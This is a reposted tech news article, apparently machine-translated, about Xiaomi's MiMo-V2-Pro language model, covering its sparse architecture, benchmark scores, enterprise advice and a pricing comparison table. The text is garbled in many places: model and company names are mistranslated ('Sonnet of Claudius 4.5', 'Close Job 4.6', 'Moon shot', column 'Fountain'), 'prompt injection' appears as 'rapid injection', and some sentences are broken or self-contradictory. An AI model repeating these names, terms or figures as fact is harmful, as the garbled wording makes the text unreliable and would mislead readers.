Xiaomi surprises with the new MiMo-V2-Pro LLM that approaches the performance of GPT-5.2 and Opus 4.6 at a fraction of the cost

Chinese automobile and electronics manufacturer Xiaomi surprised the global AI community today with the launch of MiMo-V2-Proa new 1 trillion-parameter baseline model with benchmarks that approach those of US AI giants OpenAI and Anthropic, but at around a seventh or sixth of the cost when accessed via a proprietary API and, importantly, sending fewer than 256,000 data tokens back and forth.

Led by Fuli Luo, a veteran of the disruptive DeepSeek R1 project, the release represents what Luo characterizes as a "silent ambush" on the global frontier. Furthermore, Luo stated in a x publication that the company plans to open a model variant of this latest version, " when the models are stable enough to merit it."

By focusing on the "action space" of intelligence: moving from code generation to the autonomous operation of digital technologies. "claws"—Xiaomi is trying to completely skip the conversational paradigm.

Before this foray into the AI frontier, Beijing-based Xiaomi established itself as a titan of "The internet of things" and consumer hardware.

Globally recognized as the world’s third-largest smartphone maker, Xiaomi spent the early 2020s executing a high-risk entry into the automotive sector. Its electric vehicles (EVs), such as the SU7 and the recently launched YU7 SUV, have turned the company into a vertically integrated powerhouse capable of merging hardware, software and, now, advanced reasoning.

This physical-world engineering pedigree informs the architecture of MiMo-V2-Pro; is built to be the "brain" of complex systems, whether those systems manage global supply chains or navigate the intricate scaffolding of an autonomous encryption agent.

Technology: the architecture of the agency

The central challenge of "Agent Era" is to maintain high-fidelity reasoning over massive expanses of data without incurring prohibitive cost. "intelligence tax" in latency or cost. MiMo-V2-Pro addresses this through a sparse architecture: while it houses 1T of total parameters, only 42B are active during any forward step, making it approximately three times the size of its predecessor, MiMo-V2-Flash.

The efficiency of the model is based on an evolved Hybrid Attention mechanism. Standard transformers typically face a quadratic increase in computing requirements as the context grows; MiMo-V2-Pro uses a 7:1 hybrid ratio (increased from 5:1 in the Flash version) to manage its massive 1 million token context window. This architectural choice allows the model to maintain a deep "memory" of long-running tasks without the performance degradation typically seen in leading-edge models.

The analogy: Think of the model not as a student reading a book page by page, but as an expert researcher in a huge library. The 7:1 ratio allows the model "skim" 85% of the data for context while applying high-density attention to the 15% most relevant to the task at hand.

This is combined with a lightweight multi-token prediction (MTP) layer, which allows the model to anticipate and generate multiple tokens simultaneously, dramatically reducing the latency required for the "thought" phases of agent workflows. According to Luo, these structural decisions were made months in advance, specifically to provide a "structural advantage" by the unexpected speed at which the industry pivoted towards agents.

Product and Benchmarking: A Third Party Reality Check

Xiaomi’s internal data paints a picture of a model that stands out in "real world" tasks on synthetic reference points. On GDPval-AA, a benchmark that measures performance in real-world agentic work tasks, MiMo-V2-Pro achieved an Elo of 1426, placing it ahead of its major Chinese peers such as GLM-5 (1406) and Kimi K2.5 (1283).

While still lagging behind the West "maximum effort" Models such as Claude Sonnet 4.6 (1633) in raw Elo, represent the highest performance recorded for a model of Chinese origin in this category.

The Third Party Benchmarking Organization Artificial analysis verified these claims.placing MiMo-V2-Pro at 10th in their overall IQ with a score of 49. This puts it on the same level as GPT-5.2 Codex and ahead of Grok 4.20 Beta. These results suggest that Xiaomi has successfully built a model capable of performing the high-level reasoning necessary for engineering and production tasks.

Key Artificial Analysis metrics highlight a significant jump from the previous open-weight version, MiMo-V2-Flash (which scored 41):

Hallucination rate: The Pro model reduced hallucination rates to 30%, a huge improvement over the Flash model’s 48%.
Omniscience index: It earned a +5, putting it ahead of GLM-5 (+2) and Kimi K2.5 (-8).
Token efficiency: To run the entire IQ, MiMo-V2-Pro required only 77 million output tokens, significantly less than GLM-5 (109 million) or Kimi K2.5 (89 million), indicating a more concise and efficient reasoning process.

Xiaomi’s own graphics further emphasize its "General Agent" and "Encoder agent" capabilities. On ClawEval, a benchmark for agent scaffolds, the model scored 61.5, approaching the performance of Claude Opus 4.6 (66.3) and significantly outperforming GPT-5.2 (50.0). In specific coding environments such as Terminal-Bench 2.0, it achieved an 86.7, suggesting high reliability when executing commands in a live terminal environment.

How companies should evaluate the use of MiMo-V2-Pro

For those described in contemporary AI organizations, from infrastructure to security, MiMo-V2-Pro represents a paradigm shift in the "Price-Quality" curve.

Infrastructure decision makers will find MiMo-V2-Pro a compelling candidate for the Pareto frontier between intelligence and cost. Artificial Analysis reported that running its index cost just $348 for MiMo-V2-Pro, compared to $2,304 for GPT-5.2 and $2,486 for Claude Opus 4.6.

For organizations managing GPU clusters or procurement, the ability to access top 10 global intelligence at about one-seventh the cost of traditional Western companies is a powerful incentive for production-scale testing.

Data decision makers can leverage 1M’s context window for RAG-ready architectures, allowing them to feed entire enterprise codebases or documentation sets into a single message without the fragmentation required by smaller context models.

System/orchestration decision maker should evaluate MiMo-V2-Pro as primary "brain" for the coordination of multiple agents. Because the model is optimized for OpenClaw and Claude Code, it can handle long-term planning and precise tool usage without the constant human intervention that plagues previous models.

Its high GDPval-AA ranking suggests it is particularly well-suited for the workflow and orchestration layer needed to scale AI across the enterprise. It enables the creation of systems that can go beyond simple automation toward solving complex, multi-step problems.

However, security decision makers should proceed with caution. the very "agent" The nature that makes the model powerful (its ability to use terminals and manipulate files) increases the surface area for rapid injection and unauthorized access to the model.

While its low hallucination rate (30%) is a defensive advantage, the lack of public weights (unlike the Flash version) means that internal security teams cannot perform deep analysis. "model level" Audits are sometimes required for highly sensitive implementations. Any enterprise implementation must be accompanied by solid monitoring and auditability protocols.

Pricing, availability and the way forward

Xiaomi has priced the MiMo-V2-Pro to dominate the developer market. Pricing is tiered based on context usage, with competitive rates for caching to support high-frequency reasoning tasks.

MiMo-V2-Pro (up to 256K): $1 for 1 million input tokens and $3 for 1 million output tokens
MiMo-V2-Pro (256K-1M): $2 for 1 million input tokens and $6 for 1 million output tokens
Cache read: $0.20 per 1 million tokens for the lowest tier and $0.40 for the highest tier
Write cache: Temporarily free ($0)

Here’s how it compares to other leading frontier models around the world:

Model	Input	Production	Total cost	Fountain
Grok 4.1 Fast	$0.20	$0.50	$0.70	xAI
Minimax M2.7	$0.30	$1.20	$1.50	minimax
Gemini 3 Flash	$0.50	$3.00	$3.50	Google
Kimi-K2.5	$0.60	$3.00	$3.60	Moon shot
MiMo-V2-Pro (≤256K)	$1.00	$3.00	$4.00	Xiaomi MiMo
GLM-5-Turbo	$0.96	$3.20	$4.16	open router
GLM-5	$1.00	$3.20	$4.20	Z.ai
Claude Haiku 4.5	$1.00	$5.00	$6.00	anthropic
Qwen3-Max	$1.20	$6.00	$7.20	Alibaba Cloud
Gemini 3 Pro	$2.00	$12.00	$14.00	Google
GPT-5.2	$1.75	$14.00	$15.75	Open AI
GPT-5.4	$2.50	$15.00	$17.50	Open AI
Sonnet of Claudius 4.5	$3.00	$15.00	$18.00	anthropic
Close Job 4.6	$5.00	$25.00	$30.00	anthropic
GPT-5.4 Pro	$30.00	$180.00	$210.00	OpenAI

This aggressive positioning is designed to foster the high-intensity application flows that define the next generation of software. The model is currently only available through Xiaomi’s own API, with no current support for images or multimodal input, a notable omission in an era of "omni" models, although Xiaomi has shown a separate MiMo-V2-Omni for those needs.

He "Alpha Hunter" The period at OpenRouter demonstrated that the market has a strong appetite for this specific combination of efficiency and reasoning. Fuli Luo’s philosophy: that the speed of research is driven by a "genuine love for the world you are building for"— has resulted in a model that ranks second in China and eighth worldwide according to established intelligence indices.

If it remains a "don’t worry" ambush or become the basis for a global realignment of AI power depends on how quickly developers adopt the "action space" about him "chat window". For now, Xiaomi has moved the goal: the question is no longer just "Can you speak?" but "Can he act?"

Source link

Xiaomi surprises with the new MiMo-V2-Pro LLM that approaches the performance of GPT-5.2 and Opus 4.6 at a fraction of the cost

Technology: the architecture of the agency

Product and Benchmarking: A Third Party Reality Check

How companies should evaluate the use of MiMo-V2-Pro

Pricing, availability and the way forward

Leave a ReplyCancel Reply

Apple TV: Grey’s Anatomy alum joins season 5 of The Morning Show

Save $450 on the Segway Max G3 electric scooter

It’s not a typo: Mint Mobile is now selling the Google Pixel 10 for just $299, plus you get 50% off a year of unlimited access

Technology: the architecture of the agency

Product and Benchmarking: A Third Party Reality Check

How companies should evaluate the use of MiMo-V2-Pro

Pricing, availability and the way forward

Leave a ReplyCancel Reply

Trending now

Apple TV: Grey’s Anatomy alum joins season 5 of The Morning Show

Save $450 on the Segway Max G3 electric scooter

It’s not a typo: Mint Mobile is now selling the Google Pixel 10 for just $299, plus you get 50% off a year of unlimited access